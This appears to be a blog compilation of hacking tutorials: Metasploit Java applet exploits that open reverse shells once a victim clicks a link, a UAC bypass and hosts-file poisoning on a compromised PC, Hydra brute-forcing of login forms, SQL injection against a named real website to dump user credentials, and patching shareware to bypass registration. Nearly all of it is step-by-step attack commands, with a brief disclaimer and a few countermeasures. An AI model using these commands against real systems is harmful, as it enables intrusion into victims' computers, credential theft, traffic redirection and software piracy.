HACK REMOTE P.C. USING LATEST JAVA VULNERABILITY

JAVA APPLET JMX REMOTE CODE EXECUTION:-

This vulnerability is exploited in February 2013.Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Any O.S. Which is running java 7 update 10 is exploitable. Just attacker require metasploit.

Open your terminal & type following code

msfconsole

use exploit/windows/browser/java_jre17_jmxbean_2
msf exploit (java_jre17_jmxbean_2)>set payload java/shell_reverse_tcp

msf exploit (java_jre17_jmxbean_2)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (java_jre17_jmxbean_2)>set srvhost 192.168.1.7 (This must be an address on the local machine)

msf exploit (java_jre17_jmxbean_2)>set uripath / (The Url to use for this exploit)

msf exploit (java_jre17_jmxbean_2)>exploit

Now an URL you should give to your victim http://192.168.1.7:8080/

Send link to victim. As soon as he clicked you got session. Type following command.

Sessions -l

sessions -i 1

Now you get victim `s shell.

D.N.S. POISONING USING METASPLOIT.

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.

What is BRUTE-FORCE attack ?

What is BRUTE-FORCE attack ?


A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

How to install THC-hydra ?

Open your terminal & type following command
(1)sudo bash
(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
(3)After downloading ,we are going to extract it
tar -xvf hydra-6.3-src.tar.gz
(4)tar -xvf hydra-6.3-src.tar.gz
(5)./configure && make && install
(6)make install

How to use THC-hydra?

If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)
Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.
Type following command in terminal
./hydra -l admin -P /root/Words.txt site.com http-post-form "/login.php&username=^USER^&password=^PASS^"

The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login).
The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always)
If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".
Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code.
They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are.
Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra
-vV - The verbose mode. This mode shows you every login attempt hydra tries.
-s - We specify the port on which we're running our attack.
-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.
-R - Restores a previously aborted session of an attack.
-e ns - Checks for blank or no password fields.

How to hack websites By using SQL Injection

Today i am GOing to Describe What the SQL Injection IS and How It will Going to help in Hacking the Websites..
I was Asked By Warious Users To Write A Turotial About
HOW TO HACK THE WEBSITES?
Today I am Going to Discuss the Easiest Way to hack the Websites i.e SQL Injection Techniques.
We Will Use The Software SQLI Helper to Perform This. I have provided link for software download... just read on.

How to hack website using SQLI Helper:
SQLI Helper is handy software to hack website. You don't need to have any knowledge of SQL to hack website using SQLI Helper. Just follow the guidelines below:


1. Free DownLoad SQLI Helper to hack websites.

2. Unzip the file to obtain SQLI Helper to hack website.

3. Now, when you have website hacking software, you need to find website with potential vulnerability. There are some websites that are unhackable. While finding hackable websites, it is better to search for sites with format "article.php?id=[number]" in url.

Lets consider one example which I will use in this article:

http://encycl.anthropology.ru/article.php?id=1

Check whether your searched victim site can be hacked by entering:

http://encycl.anthropology.ru/article.php?id='1

in address bar and hit enter. You will get error message like:

Query failed.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

If you get such error message, it is confirmed that you can hack website using this method and now you can move forward to hack website.

4. Run SQLI Helper on your Computer.








5. In target field, enter http://encycl.anthropology.ru/article.php?id=1 (the website url you just discovered as hackable) and hit on "Inject".

6. SQLI Helper will search for columns and you will have something like this: 

7. Hit on "Get Database" to get:

8. Select any element from "Database Name" and click on "Get Tables".

9. Now, select element from table and hit on "Get Columns". I have selected "user" to get userid and password required for login.

10. Now, when you know "user" table has columns "usr_login" and "usr_pass", select them and hit on "Dump Now".

11. You will get values like these:

12. The values achieved are actually in hash and hence you have to crack these hashes to get userlogin and password to hack website. For this, go to http://www.md5crack.com/ and crack the hash using "Crack that hash baby" button. Thus, you are now able to hack website as you have got website user id and password. Once, you get admin password, you can easily hack website.
Thus friends, now, I hope you know how to hack website using SQL Helper. Note that using this method you cannot hack every website. SQL Helper will help you to hack website in easy way. If you have any problem in using
SQL Helper to hack website,please mention it in comments.


Enjoy SQL Helper to hack website...

If you like our post please share it with your friends.

Hack Websites Using Havij [SQL Injection Tutorial]

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Warning - This article is only for education purposes, By reading this article you agree that Hacky Shacky is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

• MsSQL 2000/2005 with error.

• MsSQL 2000/2005 no error union based

• MySQL union based

• MySQL Blind

• MySQL error based

• MySQL time based

• Oracle union based

• MsAccess union based

• Sybase (ASE)

Demonstration

Now i will Show you step by step the process of SQL injection.

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.

Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:

Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures: 

Here are some of the countermeasures you can take to reduce the risk of SQL Injection

1. Renaming the admin page will make it difficult for a hacker to locate it
2. Use a Intrusion detection system and compose the signatures for popular SQL injection strings
3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

HOW TO CRACK A SOFTWARE (for beginners)

How to get started in the art of cracking

Introduction:
————-
Tons of new programs are coming out each day… But the bad thing is that
most of them are shareware, which means that you have to pay to get the full
version (most of the time, when you’ll register, the creators of the program
will e-mail you an unlock code)… But there are some guys called “crackers”
who can modify the program so that you don’t need to pay to get the full
version. In this tutorial, you’ll learn how to crack programs (except VB
programs). I hope that you’ll enjoy it.

———————————————-|1) Programs that you’ll need to get started |
|2) Basic things about cracking |

1) Programs that you’ll need to get started

—————————————-

Here’s the list of programs that you’ll need to get to start cracking:

WinDisassembler
Hex Workshop
Hacker’s View

2) Basic things about cracking
—————————

Please remember that in this tutorial, I expect that you never cracked a
program, so it should be easy for beginners.

Here is, step by step, what you have to do to crack a program which needs a
name and a serial number (assuming that there’s no good protection):

a) Run the program
cool.gif Go to the place where you can enter your name and a serial number
c) Type your name and any serial number
d) Write down (or memorise) the error message
e) Copy the program’s exe to .bak (for backup) and to .w32
f) Disassemble [progname].w32 with WinDisassembler
g) Click on search -> search. Type the error message, and click on search
h) Scroll up until you find this “Referenced by a (U)nconditional or
©onditional Jump at Address: | blabla” (where blabla is the address)
i) Go to this address by scrolling up (the addresses are writen on the left)
j) There should be “jne” written at this address.

h) Double-click on the line and memorise the offset (written on the status bar)
i) Launch hacker’s view and edit the exe files
j) Press F4 and select Decode Mode
k) Press F5 and type the Offset.
l) Press F3 and type 74 (which will change jne to je)
m) If the program isn’t very securised, it should be cracked now!
n) Run the program
o) Type your name and any serial number
p) It should work!

Note: If it didn’t work, then it means that the program is more protected.
you have to learn more about assamble language and practice hard to crack advanced softwares.

Hacking Windows 7 Using Metasploit

1. Open terminal, type msfconsole and hit enter. Metsaploit will open like in image.



2. Now type use exploit/multi/browser/java_signed_applet and hit enter.

3. Type set payload windows/meterpreter/reverse_tcp and hit enter.

4. Type set lhost 223.185.18.74 (must change 223.185.18.74 with your ip address)

5. Now type set lport 443 and hit enter.

6. Now type set srvport 80 and hit enter.

7. Now type set uripath JackDaniels and hit enter.(you may change JackDaniels to your disired one)

8. At last type exploit and hit enter.